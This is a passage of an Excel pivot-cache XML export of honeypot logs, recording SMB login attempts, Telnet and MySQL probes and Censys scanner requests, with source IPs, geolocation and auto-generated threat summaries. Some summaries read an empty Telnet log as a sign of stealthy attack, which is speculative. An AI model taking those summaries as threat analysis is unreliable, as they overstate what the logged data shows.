    <x v="0"/>
    <d v="2025-04-29T05:08:28"/>
    <d v="2024-06-28T06:29:40"/>
    <d v="2025-04-29T05:08:28"/>
    <n v="87"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;43985&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Agoura Hills"/>
    <s v="5322553"/>
    <s v="91301"/>
    <s v="34.146"/>
    <s v="-118.777"/>
    <s v="5033"/>
    <s v="Key Information Systems, Inc."/>
    <s v="Key Information Systems, Inc."/>
    <s v="business"/>
    <s v="Key Information Systems, Inc."/>
    <s v="1996-08-17"/>
    <s v="ISWEST-BLK-1"/>
    <s v="2014-09-24"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63515)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63101)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62669)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63520)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62583)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62136)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63782)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63369)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63733)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62797)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,63617)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62133)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62616)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (207.178.215.218,62635)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cfb2:d7da"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unauthorized access attempt via file sharing service._x000a_ User attempted to authenticate with SMB credentials._x000a_Possible reconnaissance or initial step in malware spread. &amp;&amp; Malicious activity detected: A potential SMB authentication attempt was made to a vulnerable service, possibly an attempt to gain unauthorized access or exploit the system. This could be an indication of a targeted attack on a specific system or network. An attacker may try to use this as a foothold for further malicious activities. &amp;&amp; Malicious attempt to authenticate using SMB protocol, possibly an exploitation of unpatched vulnerability or part of brute-force attack sequence, targeting sensitive network resources for unauthorized access. The authentication message suggests the attacker is trying to establish a connection to a system with specific credentials, which could be used for further malicious activities. This behavior may indicate a potential security breach or intrusion attempt."/>
    <s v="SMB Brute Force &amp;&amp; SMB Brute"/>
  </r>
  <r>
    <x v="474"/>
    <x v="474"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T05:02:12"/>
    <d v="2025-04-29T05:02:12"/>
    <d v="2025-04-29T05:02:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:d190"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Telnet service connection attempt was made but no activity occurred as indicated by &quot;NA&quot;. This suggests a failed or reconnaissance attempt to access the system. It could be a scan for vulnerable services. &amp;&amp; No TELNET activity detected. This indicates that no malicious attempts were made through this service. No login or communication occurred via TELNET protocol."/>
    <s v="Port Scan &amp;&amp; Scanning Attempt"/>
  </r>
  <r>
    <x v="475"/>
    <x v="475"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T04:43:48"/>
    <d v="2025-04-29T03:36:49"/>
    <d v="2025-04-29T04:43:48"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:4c04"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="476"/>
    <x v="476"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T04:34:42"/>
    <d v="2025-04-29T04:34:42"/>
    <d v="2025-04-29T04:34:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="27"/>
    <s v="Osaka"/>
    <s v="Osaka-shi"/>
    <s v="Osaka"/>
    <s v="1853909"/>
    <s v="540-0002"/>
    <s v="34.6937"/>
    <s v="135.502"/>
    <s v="23959"/>
    <s v="OWL-AS-AP"/>
    <s v="Owl Limited"/>
    <s v="hosting"/>
    <s v="Owl Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c272:8865"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="477"/>
    <x v="477"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T04:32:44"/>
    <d v="2025-04-29T04:32:44"/>
    <d v="2025-04-29T04:32:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3183:34ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="478"/>
    <x v="478"/>
    <s v="prod-boron-us-central-5.li.binaryedge.ninja&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T04:29:38"/>
    <d v="2025-03-23T15:01:29"/>
    <d v="2025-04-29T04:29:38"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;abuseipdb"/>
    <s v="3306&amp;&amp;NA&amp;&amp;21&amp;&amp;143&amp;&amp;5900"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Dallas"/>
    <s v="Richardson"/>
    <s v="4722625"/>
    <s v="75080"/>
    <s v="32.9483"/>
    <s v="-96.7299"/>
    <s v="63949"/>
    <s v="Akamai Technologies, Inc."/>
    <s v="Akamai Technologies, Inc."/>
    <s v="hosting"/>
    <s v="Linode"/>
    <s v="2011-05-06"/>
    <s v="LINODE-US"/>
    <s v="2023-09-18"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2015-04-10 13:57:21"/>
    <s v="2026-04-10 13:57:21"/>
    <s v="2025-03-16 04:02:41"/>
    <s v="['amir.ns.cloudflare.com', 'ines.ns.cloudflare.com']"/>
    <s v="Cloudflare, Inc"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED"/>
    <x v="9"/>
    <s v="NA"/>
    <s v="REDACTED"/>
    <s v="::ffff:607e:7b15"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="479"/>
    <x v="479"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T04:14:42"/>
    <d v="2025-04-29T04:14:42"/>
    <d v="2025-04-29T04:14:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="29"/>
    <s v="Gwangju"/>
    <s v="Gwangsan-gu"/>
    <s v="Songjeong-dong"/>
    <s v="1836169"/>
    <s v="506010"/>
    <s v="35.136"/>
    <s v="126.799"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7993:dc1b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log indicates that there was an attempt to connect to the TELNET service, but it failed as indicated by NA (not applicable or no activity). This could be a failed brute force login attempt or simply a user trying to access a non-existent service. No meaningful activity occurred with this connection attempt. &amp;&amp; No TELNET activity detected, but this could indicate that the malicious actor is using a different service or protocol to gain access to the system, potentially indicating an attempt to exploit a vulnerability or launch a targeted attack. _x000a_This lack of activity might also suggest that the attacker is using a stealthy approach, trying to remain undetected by avoiding typical detection methods. _x000a_The absence of TELNET activity could be a red flag for more sophisticated or covert malicious behavior."/>
    <m/>
  </r>
  <r>
    <x v="480"/>
    <x v="480"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T04:04:21"/>
    <d v="2023-07-26T01:09:31"/>
    <d v="2025-04-29T04:04:21"/>
    <n v="1327"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SIP_H6&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SIP_H3&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_IPP_H30&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_RDP_H4&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_IRC_H12&amp;&amp;SMA-LAB_IPP_H19&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_IPP_H26&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_IPP_H4&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_RDP_H32&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_IRC_H14&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_IPP_H12&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_MYSQL_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;25&amp;&amp;20509&amp;&amp;80&amp;&amp;143&amp;&amp;443&amp;&amp;23&amp;&amp;110&amp;&amp;389&amp;&amp;21&amp;&amp;1433&amp;&amp;5432&amp;&amp;631&amp;&amp;6667&amp;&amp;1521&amp;&amp;6379&amp;&amp;1080&amp;&amp;8443&amp;&amp;3389&amp;&amp;5900&amp;&amp;445&amp;&amp;36428&amp;&amp;3306&amp;&amp;59214&amp;&amp;45218&amp;&amp;9100&amp;&amp;48380&amp;&amp;39438&amp;&amp;39454&amp;&amp;55960&amp;&amp;42646&amp;&amp;42654"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']}"/>
    <n v="179"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Ann Arbor (Old West Side)"/>
    <s v="4984247"/>
    <s v="48104"/>
    <s v="42.2809"/>
    <s v="-83.7489"/>
    <s v="398324"/>
    <s v="Censys, Inc."/>
    <s v="Censys, Inc."/>
    <s v="hosting"/>
    <s v="Censys, Inc"/>
    <s v="2021-09-13"/>
    <s v="CENSY"/>
    <s v="2024-03-29"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA&amp;&amp;request&amp;&amp;stshash&amp;&amp;command&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.40.123:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.118;rport=46655'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,46570)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.118;rport=41479'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.118;rport=53431'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 